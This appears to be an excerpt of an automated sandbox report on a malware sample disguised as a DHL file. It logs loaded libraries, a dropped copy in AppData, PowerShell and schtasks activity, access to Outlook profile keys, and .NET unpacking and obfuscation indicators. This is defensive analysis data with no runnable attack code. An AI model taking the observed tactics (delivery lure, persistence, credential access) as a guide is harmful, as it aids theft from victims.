                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: iconcodecservice.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeAutomated click: OK
                      Source: C:\Users\user\AppData\Roaming\uvbIwIYe.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: DHL_231437894819.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DHL_231437894819.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: DHL_231437894819.bat.exe, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                      Source: uvbIwIYe.exe.0.dr, ServerForm.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, j8ssktVmGhRhLe0B6k.cs.Net Code: SgLP65eFbw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_231437894819.bat.exe.3c14468.2.raw.unpack, MainForm.cs.Net Code: _202B_200C_200F_200D_200D_202A_206D_202C_200B_200E_202B_206E_206B_206B_206E_200B_200F_206E_200E_202E_200F_202A_200D_200B_206C_206B_200F_200B_200C_206A_206A_200F_202E_200C_206E_200F_206C_206D_202D_202B_202E System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_231437894819.bat.exe.46c7428.0.raw.unpack, j8ssktVmGhRhLe0B6k.cs.Net Code: SgLP65eFbw System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.DHL_231437894819.bat.exe.a510000.6.raw.unpack, j8ssktVmGhRhLe0B6k.cs.Net Code: SgLP65eFbw System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\DHL_231437894819.bat.exeCode function: 0_2_076E5231 push E00516D5h; retf 0_2_076E523D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01170C45 push ebx; retf 10_2_01170C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01170C6D push edi; retf 10_2_01170C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01170CCC push edi; retf 10_2_01170C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01270C6D push edi; retf 16_2_01270C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01270C45 push ebx; retf 16_2_01270C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_01270CCB push edi; retf 16_2_01270C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 16_2_06B24645 push 0406BADAh; iretd 16_2_06B2465D
                      Source: DHL_231437894819.bat.exeStatic PE information: section name: .text entropy: 7.686508878932828
                      Source: uvbIwIYe.exe.0.drStatic PE information: section name: .text entropy: 7.686508878932828
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, CnHZ4nFFSQNWoh3XZ8.csHigh entropy of concatenated method names: 'FyU1aFkFU0', 'QIS1uFrEFY', 'O9N1RvRem0', 'FKm1JfZo3P', 'u6y1QFBqmk', 'D201HAmFoB', 'yiV13VNhao', 'u8C1IO7QKW', 'mo91oaFZbe', 'Ucv1M6RIRy'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, wFDKFK56TvYPu3IEkr.csHigh entropy of concatenated method names: 'Kfxi89qKIN', 'WNWixqV2Z9', 'RQOLEIEgTm', 'GPbLDOkn0L', 'r3AiMFMNhO', 'RwTinRxZ5I', 'GWSiFbfnDW', 'nUbid4PvRG', 'NegiSMJoyN', 'DTVi78I0nB'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, lLKHiUlsR6De2UuAF1.csHigh entropy of concatenated method names: 'YBakRNOPaQ', 'DaukJbEAUl', 'wDnk0TKhjW', 'jnCkQodEp2', 'Cj4kHHATFv', 'qoIkNddcYK', 'CGXk3qq9B1', 'WRQkIMDicx', 'F8akWvhJbr', 'GstkobW4sQ'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, eBMXbAdtYlyGT360Ka.csHigh entropy of concatenated method names: 'WBueolGTnN', 'qmhenslU1d', 'OgxedC0jy4', 'UlSeS0CRYf', 'qRDeJmjTD5', 'GUce0QwuRC', 'MHneQu87AB', 'OPHeHJavFc', 'U9yeNsQO2l', 'kIle3JH6Y4'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, OcHrdeaLLWK7BX0qEn.csHigh entropy of concatenated method names: 'Q1MGdCYbli', 'MqGGSNagVO', 'S3QG7hA5em', 'bmGGZPgyVZ', 'npWGj37gLJ', 'cXbG56fCaU', 'EN0G4YnHpo', 'JZIG8cFtHt', 'gnUGl4EnyR', 'miXGxpo3OY'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, ATQ7dwDXSlfahW1odIE.csHigh entropy of concatenated method names: 'ToString', 'VXPOapDbcq', 'lYiOuVHyLF', 'sSOOwRdCuG', 'HBbOR2wKSC', 'WhpOJTYKWa', 'hRdO0Flhle', 'qyHOQ5AKJq', 'WVBKxJdqLurNUuUiwhQ', 'TCdtJxdu9V8gyh8Igm6'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, hqeXMWDEKGoWC5nrtyW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pFACMq8xA9', 'AVUCnf60aI', 'CqMCFZVdLK', 'Xq9CdZbskc', 'R1MCSiRIyh', 'Xm0C7821wE', 'PmPCZbPZgy'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, nvBk4m3G4ZXSrBJYXB.csHigh entropy of concatenated method names: 'lOFtg1nA81', 'aKbtvJQDnb', 'wxRtceXpxM', 't2TcxiwmNE', 'zgjczTdd2Q', 'BhjtERFZVc', 'WbZtDbyA96', 'cTHtXMeGVT', 'J6UtpExZH8', 'HkEtP4LNBC'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, GqniEswF6biBLm0KlJ.csHigh entropy of concatenated method names: 'Cxys2ZLQ6a', 'UCBsAfqQAg', 'mL2v0ceBbe', 'hwSvQQ6wrW', 'IwavHKVjX9', 'R1XvN3tHmr', 'Nhkv3GWolO', 'S9yvIcVtlt', 'O9kvWsEe9R', 'R7NvoFbsfq'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, IvDoetz5KqokI1y0Cn.csHigh entropy of concatenated method names: 'LW3CbJvN7m', 'EWRCa3iNZB', 'w1mCu2VtQm', 'BFsCRW0glh', 'yTOCJFPjct', 'x6cCQn21yU', 'SrUCH3ME8T', 'Jv9Cm0UfYv', 'KoQC9pBCmE', 'cFUCq3mXat'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, bl8h2hPaa2j5IkYyGB.csHigh entropy of concatenated method names: 'pHMDtcHrde', 'qLWDVK7BX0', 'RMJDBVRT0Y', 'YIqDUvJqni', 'x0KDelJemV', 'MvpDY8jUVi', 'OeqreguNEoxgCawsQq', 'DVTXvnJJgjbYxTCoxl', 'anL2qPqkIpISEBCmc9', 'WP0DD7rWPX'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, AJLRIHDDdK562aLaZHO.csHigh entropy of concatenated method names: 'VHICxWBq8j', 'NwICzahj0P', 'X2GOEiU5uy', 'UsPODHeGms', 'xL4OXyvl5n', 'Xd2OpAulqq', 'FbcOPEUEDr', 'qoLOhuLx7g', 'MrGOg0DJWG', 'toVOGB9SFL'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, qrWO2JXi5BGLtLJQcd.csHigh entropy of concatenated method names: 'QCE659W0o', 'siKKb6UGh', 'VGebjoQcj', 'KuSAbSmhs', 'BS8uaQgta', 'bAFwDfl9s', 'Eibqet3Hr5b9f5aDXk', 'Mcy1iRNGEIC3iKZ3wO', 'rWLL3L8bm', 'bGNCT6bZv'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, loRipS4coX6cPlGq2e.csHigh entropy of concatenated method names: 'XLBkev771q', 'GxekiQg5Ie', 'ymnkklxCBQ', 'FiDkOHIHDi', 'fQEkryg3lv', 'SKUkmthuoy', 'Dispose', 'i6CLgW6FYr', 'PbfLGOEhST', 'gtyLvlIW2N'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, mpSvESuMJVRT0YxIqv.csHigh entropy of concatenated method names: 'iipvKfkYr0', 'a54vbeAhFS', 'iKJvah8yIa', 'VI9vuKvPok', 'yuqveK7cTo', 'RIIvYTWB4M', 'Eq0vidSlno', 'WqWvLDkSQA', 'basvkrcSDQ', 'n9UvCmKVmU'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, omVWvpR8jUViqCfHCT.csHigh entropy of concatenated method names: 'f1kchTpgp8', 'TIIcG6iGL7', 'unlcsaFk1J', 'ivNctuZCGV', 'hCtcVfWhGY', 'p3Ssj9D1Vx', 'rsds5J7fGK', 'ngxs4kR5Iq', 'etns8YpAqu', 'w4LslJ4RaD'
                      Source: 0.2.DHL_231437894819.bat.exe.4647a08.4.raw.unpack, uGsgAgDPMW45Q6ajTO7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WTYfkOE8QX', 'c2yfCRGNRY', 'omyfO8EWN0', 'Ot2ff7mjT9', 'dAYfrRYgRq', 'wB3fTo69Qh', 'ng1fmpRCld'
